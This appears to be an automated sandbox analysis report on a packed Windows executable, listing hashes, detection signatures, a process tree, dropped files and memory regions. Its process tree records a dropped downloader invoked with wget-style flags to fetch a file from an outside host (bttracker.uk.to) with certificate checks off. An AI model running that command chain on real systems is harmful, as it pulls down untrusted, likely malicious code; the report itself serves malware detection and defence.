Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    29-12-2023 23:23

General

  • Target

    06d3932e8e686d0acd65440d6a39396d.exe

  • Size

    587KB

  • MD5

    06d3932e8e686d0acd65440d6a39396d

  • SHA1

    7d89988d97cae5075be755add6be35bccd674c3a

  • SHA256

    68a246dc4a96ebf335e98db5a7c07e7e8b74596c7c28b18e2307937f8e7e2ab6

  • SHA512

    bee473db9a1b5675e1dcac8c19e041a3df30b4214c33e7d37463a6bdd64df918992ca5efbaf17a98ffc9323915274a8a4a0a5fee9386f600a3656822e60473e7

  • SSDEEP

    12288:9oS+9ZYTx6X2EsOg5I6WfasJTV47T5l4hgagtNBNfwvV4HbgGM+h4XUg2:u9ZYF6PE5WfRTylNntr+vabgGmUg2

Score
7/10
upx

Malware Config

Signatures

  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 16 IoCs
  • UPX packed file 40 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\06d3932e8e686d0acd65440d6a39396d.exe
    "C:\Users\Admin\AppData\Local\Temp\06d3932e8e686d0acd65440d6a39396d.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Users\Admin\AppData\Local\Temp\soH7iuM3fHHoFnM.exe
      "C:\Users\Admin\AppData\Local\Temp\soH7iuM3fHHoFnM.exe" r
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2296
      • C:\Users\Admin\AppData\Local\Temp\U37.exe
        "C:\Users\Admin\AppData\Local\Temp\U37.exe"
        3⤵
        • Executes dropped EXE
        PID:2628
      • C:\Users\Admin\AppData\Local\Temp\b3G00ybcZNzn.exe
        "C:\Users\Admin\AppData\Local\Temp\b3G00ybcZNzn.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2732
  • C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Windows\Temp\a00849.bat" "C:\Users\Admin\AppData\Local\Temp\b3G00ybcZNzn.exe" "
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Users\Admin\AppData\Local\F8CF33AD986170E3D24561D4B8B8D76B.EXE
      F8CF33AD986170E3D24561D4B8B8D76B.EXE -o F70130C44CDD00A372972E2323195E7A -d -t 0 --retry-connrefused -w 5 --random-wait --no-dns-cache --restrict-file-names=windows -nd -nH --no-cache --ignore-length --no-cookies --no-check-certificate --follow-ftp http://bttracker.uk.to/affiliate/549683/adsvp.php
      2⤵
      • Executes dropped EXE
      PID:2140
    • C:\Users\Admin\AppData\Local\C0CA437737654CA667038D6B2C1B5D1E.EXE
      C0CA437737654CA667038D6B2C1B5D1E.EXE BE97944D33AC498D00EAEFB0144C844A
      2⤵
      • Executes dropped EXE
      PID:2036
    • C:\Users\Admin\AppData\Local\C907D7A30E7D43AFD00202154480A33A.EXE
      C907D7A30E7D43AFD00202154480A33A.EXE -o "(?<=UrlFilename: )\S+$" F70130C44CDD00A372972E2323195E7A
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2988
    • C:\Users\Admin\AppData\Local\C0CA437737654CA667038D6B2C1B5D1E.EXE
      C0CA437737654CA667038D6B2C1B5D1E.EXE F8410FF3AF7B31560FCD4B6EF91C73DD
      2⤵
      • Executes dropped EXE
      PID:756
    • C:\Users\Admin\AppData\Local\C907D7A30E7D43AFD00202154480A33A.EXE
      C907D7A30E7D43AFD00202154480A33A.EXE -o "(?<=`)[^']+(?=' saved \[\d+\]$)" F70130C44CDD00A372972E2323195E7A
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:1576

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\C907D7A30E7D43AFD00202154480A33A.EXE

    Filesize

    13KB

    MD5

    dd7864264dc80ca797e13ea4ab59d77d

    SHA1

    50f6e8d352403daad08bd64cfb6094dc9cf01f7c

    SHA256

    194c8904cd7ee5e6baa2360f8390d05644a24abb6056c9a3d3996f65bf86e268

    SHA512

    6080e6116423c9a758ff3c819b3193c2f2bd42d4a20ceb577c9a0cc641f7023a18ebbb842d23155cbb7999e6f12c224b03eab850011987a5e6bd3cda6ac17882

  • C:\Users\Admin\AppData\Local\D6C4EAF1006C3841FE4E9E271D32129E.BAT

    Filesize

    74B

    MD5

    8c02566de6078f7db8d837da24bc8af6

    SHA1

    6bccaca0b9c3ce68a9dc19ad326b1333f170857a

    SHA256

    5bdd197337aea22c48810b1ea3f103fcb067577c8146f65a2ae05c50d8b760b7

    SHA512

    7728c6ddc6f481a5e9128eccee5ea2b16b5f6e65ce248f8e28650ebd982a1df2ebf170407bb716b1934456df9e78c6b60e9cb0df3807387f6cf2a780ecf6456a

  • C:\Users\Admin\AppData\Local\F70130C44CDD00A372972E2323195E7A

    Filesize

    209B

    MD5

    fc0dd98f1078c74642ae519bfffa13c1

    SHA1

    bf41c4d387bb79b60580f221cbce92092d2dd3e1

    SHA256

    f135fed12b29f6581f2e931d77308fdea1e8dcff59b3b043f72e5fe9b6373c2b

    SHA512

    4f00f09600fed765489dc113a996329d36dde9ea679bf96ff8944b309b8c313995e4defa026b7da33c5f736d89af1c913139062683b971e35cf5a167dff15713

  • C:\Users\Admin\AppData\Local\F8CF33AD986170E3D24561D4B8B8D76B.EXE

    Filesize

    274KB

    MD5

    085c203221a207e5c189a17969c7da9a

    SHA1

    9cb7d96a1f3c5ea69dfba832bacf4ea03d143974

    SHA256

    f0cc8fe0b286630f4139c078a30cd42f63a14e419bed38f971d2f20be07ed3fb

    SHA512

    5ef43d796c2dffac441a785503549cf8484c4eb959ef5e1db8f037da6b7d7ae0f03aefa699902fccbaedaefa2449be55a362fbe714c03450801cd115f5bfd08a

  • C:\Users\Admin\AppData\Local\F8CF33AD986170E3D24561D4B8B8D76B.EXE

    Filesize

    203KB

    MD5

    2c1e03a9506076b1282f864f87a6ecc3

    SHA1

    2031d46af26f7e7c12eb365c442e9056f940e66e

    SHA256

    50d365c3368c7dae62a2c678693b256f3337ee6ebe45676a636a6a2cb3e5a8b6

    SHA512

    5c262acaa65b5db29470d9660251ec0340e08dc414c0c379c438fe43c1dfa6efffdd10acee50d574df075a5279be83dfe94fdd91523dd4e58f5853f9dd36cc7a

  • C:\Users\Admin\AppData\Local\Temp\b3G00ybcZNzn.exe

    Filesize

    180KB

    MD5

    2dd8f6d4acfbe72f36e2958d804d5ca7

    SHA1

    05f6a86345934cd1b85470983f1838d344e7f8da

    SHA256

    b09f74b432200193e4b60ff51badda39de31ee693fdb15aa954ce431fc053025

    SHA512

    241ec332ecb8a882bb678be26490ec37f7bfeb19bc47bbb28b7b674d3658d11165ca71ef4b613a03bb0a75554c3717cad7d8698ee7fd2bed9534bd4d413711aa

  • C:\Users\Admin\AppData\Local\Temp\b3G00ybcZNzn.exe

    Filesize

    296KB

    MD5

    edaffcc60fc77ceb1cddbdc53783fdbe

    SHA1

    0b1979b37e70b48438af2b2c2d6b6ea8ea38f745

    SHA256

    6586e2a3d696ed72f00b66ee38a50a4e89f9ef56a1e6c96c025118e5941550f3

    SHA512

    f9e06186528b0597c9c075439642c5d279104455d3da249cb36223d7020f420a9d68527207fa892b92b50ca20870d5dbc871b167a13f6e3d3c4795b84d047987

  • C:\Users\Admin\AppData\Local\Temp\b3G00ybcZNzn.exe

    Filesize

    244KB

    MD5

    7d69fc2b7251779ec604387f32209a60

    SHA1

    e1b9e33fca6155fbff80307ac90627873ada4b05

    SHA256

    a159d78dda5deae4304a98e0521a9d2b3ca582047412f264f62685d1b817921a

    SHA512

    acd87da8113f1fba8272188201ea5e211f05c2628b67e20b3ce79b13ac0395c95311968c40b92396131820177f6d1bdbc4c943a35916e08a568dde5577826363

  • C:\Users\Admin\AppData\Local\Temp\soH7iuM3fHHoFnM.exe

    Filesize

    192KB

    MD5

    598379932f89e80fda80ec010f34a372

    SHA1

    3e9a3f173c35c3d71a6d2f21bbd8dd2bb4c7fcc0

    SHA256

    af0574d7f1aa5192949a384de1b498ef4324cd64f966a5008e979296458e87da

    SHA512

    48a7d9b60d7396a47b98c9bfa9270e1651401df06ceaae84cb9ec77a750cc7a9fbb2312651bc61cd001828aefd7712d1c0f7e31febce6a35167db38397f251b2

  • C:\Users\Admin\AppData\Local\Temp\soH7iuM3fHHoFnM.exe

    Filesize

    258KB

    MD5

    651e22c24b669f90e681a06dfa4a8f7e

    SHA1

    45a0c8cc9f00de6d3a47be8353fb2d6a771daad8

    SHA256

    df3cd003bd5e5fe4d3eab14e3d7899b953ffd3c5eeaf88266b39457b1a4a8a21

    SHA512

    f45020ab83029554641803c910700972266240732d11a5cc0b01cecbaab701c19f0c89a4e1a70434f9db826af6c3cfb078e7474f5a70e7556b310bf347e34a70

  • C:\Users\Admin\AppData\Local\Temp\soH7iuM3fHHoFnM.exe

    Filesize

    587KB

    MD5

    06d3932e8e686d0acd65440d6a39396d

    SHA1

    7d89988d97cae5075be755add6be35bccd674c3a

    SHA256

    68a246dc4a96ebf335e98db5a7c07e7e8b74596c7c28b18e2307937f8e7e2ab6

    SHA512

    bee473db9a1b5675e1dcac8c19e041a3df30b4214c33e7d37463a6bdd64df918992ca5efbaf17a98ffc9323915274a8a4a0a5fee9386f600a3656822e60473e7

  • C:\Windows\Temp\a00849.bat

    Filesize

    1KB

    MD5

    5f219147645d6ead321d01dcfce76a4d

    SHA1

    9f4cc60c382ecd741077cfce2ecf0a4a7a5b03fc

    SHA256

    fb74fbc692f6c536076f27dbe7291cc2a545d3bf5ebf5f368d77e29779fb7c89

    SHA512

    ed65797bb3fdb08304a3be14e9384092c82d9d05fb7b0ca5275cdff919aea093fc515789fec17fc3440f28981701a29955824bc189a746124daaf70bd09bcb68

  • \Users\Admin\AppData\Local\C0CA437737654CA667038D6B2C1B5D1E.EXE

    Filesize

    3KB

    MD5

    5049de410279b8a38ff2eaffa730d91b

    SHA1

    1333be17f4476eca119016c9af30f98a433fada7

    SHA256

    ef3a5a3302e157b540e4b87789c0df5b0045c359a32a51fc7982c7d1a43b0f5a

    SHA512

    30442de03cdce07d4d0929918913fe868e5b2808025a83294cd3fe7e48a0acd52c6aa7ec9e96ee46fb187fcc73b5744ebdf2af81782554f5215ff14602012c4f

  • \Users\Admin\AppData\Local\F8CF33AD986170E3D24561D4B8B8D76B.EXE

    Filesize

    166KB

    MD5

    f278786c6e5ff1d23f7a09f621b48d87

    SHA1

    7a8b7dc959b6d88fdeddb974cd22e7fc0e237bef

    SHA256

    9089953f15431e8d086f107b07a829d54210bb460355723515eee7156de7167d

    SHA512

    e533aedaf6910a995761e6119d6ed34295ab1fb0150be6256ce4348d522d3519195e5df12cedb6217372b15271a517a6bb8c9bbcd682af0b43d4197e445e2b6e

  • \Users\Admin\AppData\Local\F8CF33AD986170E3D24561D4B8B8D76B.EXE

    Filesize

    171KB

    MD5

    b742153d95fb8cc8c09e13884449a593

    SHA1

    d49d5b213bf44e3c26db42594c20fa14650f5de0

    SHA256

    b5c51a9f5fbd09c47477ccede6a8d7fbea0933af0cbd05d4b9b0f25407ff76fc

    SHA512

    114c346592a72e0880974ac62ca435557e306c95af5c86e4919ef80d0ba5d036855142c46475a906ac6c22301ded497d2fdbabbeed54ae037369f041466db854

  • \Users\Admin\AppData\Local\Temp\U37.exe

    Filesize

    7KB

    MD5

    714c52382baec8c2de4aaf3074d5db7c

    SHA1

    3f122fe69e3e070244d7443114268a72add3fd7e

    SHA256

    7ca1abeeceb75e3c1d3a4d9b5e4f8ed5c431d6f2103d89e24f1a7b26bebe19b4

    SHA512

    1237ba312b1acc2d066d9f25efd13bcea92d2659946c4e8c2d5a0acc77e5c98ef8516b391995a1b725d81ec7d515c7a926ffea4dc8aff710768794d96757fcac

  • \Users\Admin\AppData\Local\Temp\b3G00ybcZNzn.exe

    Filesize

    187KB

    MD5

    b6454c35739ff4ba1f72914b4cecd564

    SHA1

    1e4e42eac72014326d5ff3cd24275fd80949e768

    SHA256

    ae03c8a4c543573f9494c261853b9e61fa0833773aa77439cb1dd296d0eec4ab

    SHA512

    a229d73493fe93047c6df327d1bcdeec08d4f7d8d7c4d0c0c964fa6fc817f8648f4a3b9c48345e12e8d983b2a0b23612c3cb9c0400813791945bb627b6ffa0c1

  • \Users\Admin\AppData\Local\Temp\b3G00ybcZNzn.exe

    Filesize

    203KB

    MD5

    a3e1d49d4030c595899d9832fa1cfc71

    SHA1

    02a5aab7ad4fd579a8565e31a502a891ac213311

    SHA256

    0c8327ee7bb18b5f183fdb4cc91d8c750726e5f1711befbe78c2b9592c1b69e0

    SHA512

    8f2da97ddde0f6cdb56d75426aa623cf40e87a348385c2c7bb4f145ed91818f8e7a0755de9dcfe58456321ab9249a6b7e75dc56b99ba7ed14a0b049dd943f7eb

  • \Users\Admin\AppData\Local\Temp\soH7iuM3fHHoFnM.exe

    Filesize

    547KB

    MD5

    cd2c18d254ba17e1592a926d8c859e7a

    SHA1

    8ccc8e4f12040156191c7f45df7cdedf9d24ecb1

    SHA256

    837fad6855db7db776038182ad17be9b3b76f4ef59f6d21e4e854c8c973b1216

    SHA512

    9d857c6870a254a2d99870113be98b00cf4834801691255f84fb809409e9da0e79b0db0f2ebebaa3b51b6831af3bf42c03216676c3efd9c5cbcd0a93e73ae781

  • \Users\Admin\AppData\Local\Temp\soH7iuM3fHHoFnM.exe

    Filesize

    280KB

    MD5

    ac1ee40550fecd72de7a327583a3205f

    SHA1

    ea0fafaefe26e5bf285325aaea42a9a36890ee92

    SHA256

    6f182d3e76ec54917d9836291fd7eb2e04f70b8d28138f86616d8e4ed2a312b8

    SHA512

    d6fde184240c706baf1ba4deafca75656237e5499971ff7ba30a5d4e7dbb60caf5cc21bf1bc0a77ab921a69c54fd77a33ee102904b3a7c679b8de9382f3b3264

  • \Users\Admin\AppData\Local\pcre3.dll

    Filesize

    50KB

    MD5

    534542c78dbf73c3c344a39cf0895bba

    SHA1

    1715bcffd007942396e6054ffe10865038c3ae07

    SHA256

    a0eb9604b6fea53c0ad8e832ab88266cff38f747e583ef1c709eed7ea694e858

    SHA512

    02a7f2f96227def3e7fad2746c8b459db91922a76876344e0865b652054eda9f25874ed7771fecfb8228350b07748941ea2ceb76ed469a2611376cb966d50a8b

  • memory/756-94-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/1220-8-0x0000000002830000-0x0000000002854000-memory.dmp

    Filesize

    144KB

  • memory/1220-0-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/1220-14-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/1220-13-0x0000000002830000-0x0000000002854000-memory.dmp

    Filesize

    144KB

  • memory/1576-130-0x0000000061B40000-0x0000000061B6B000-memory.dmp

    Filesize

    172KB

  • memory/1576-99-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

  • memory/1576-102-0x0000000061B40000-0x0000000061B6B000-memory.dmp

    Filesize

    172KB

  • memory/2036-74-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/2036-73-0x0000000000400000-0x0000000000409000-memory.dmp

    Filesize

    36KB

  • memory/2140-66-0x0000000000400000-0x00000000004C7000-memory.dmp

    Filesize

    796KB

  • memory/2140-64-0x0000000000400000-0x00000000004C7000-memory.dmp

    Filesize

    796KB

  • memory/2296-30-0x0000000002760000-0x0000000002786000-memory.dmp

    Filesize

    152KB

  • memory/2296-29-0x0000000002760000-0x0000000002786000-memory.dmp

    Filesize

    152KB

  • memory/2296-45-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/2296-46-0x0000000002770000-0x0000000002775000-memory.dmp

    Filesize

    20KB

  • memory/2296-16-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/2296-55-0x0000000002770000-0x0000000002775000-memory.dmp

    Filesize

    20KB

  • memory/2628-56-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/2644-62-0x0000000000440000-0x0000000000507000-memory.dmp

    Filesize

    796KB

  • memory/2644-122-0x00000000005D0000-0x00000000005D1000-memory.dmp

    Filesize

    4KB

  • memory/2644-128-0x0000000000440000-0x0000000000501000-memory.dmp

    Filesize

    772KB

  • memory/2644-63-0x0000000000440000-0x0000000000507000-memory.dmp

    Filesize

    796KB

  • memory/2644-83-0x0000000000370000-0x000000000037F000-memory.dmp

    Filesize

    60KB

  • memory/2644-103-0x0000000000370000-0x0000000000379000-memory.dmp

    Filesize

    36KB

  • memory/2644-69-0x0000000000370000-0x0000000000379000-memory.dmp

    Filesize

    36KB

  • memory/2644-78-0x0000000000370000-0x000000000037F000-memory.dmp

    Filesize

    60KB

  • memory/2644-100-0x0000000000370000-0x0000000000379000-memory.dmp

    Filesize

    36KB

  • memory/2644-71-0x0000000000370000-0x0000000000379000-memory.dmp

    Filesize

    36KB

  • memory/2732-85-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2732-129-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2732-31-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2988-90-0x0000000061B40000-0x0000000061B6B000-memory.dmp

    Filesize

    172KB

  • memory/2988-89-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

  • memory/2988-86-0x0000000061B40000-0x0000000061B6B000-memory.dmp

    Filesize

    172KB

  • memory/2988-84-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB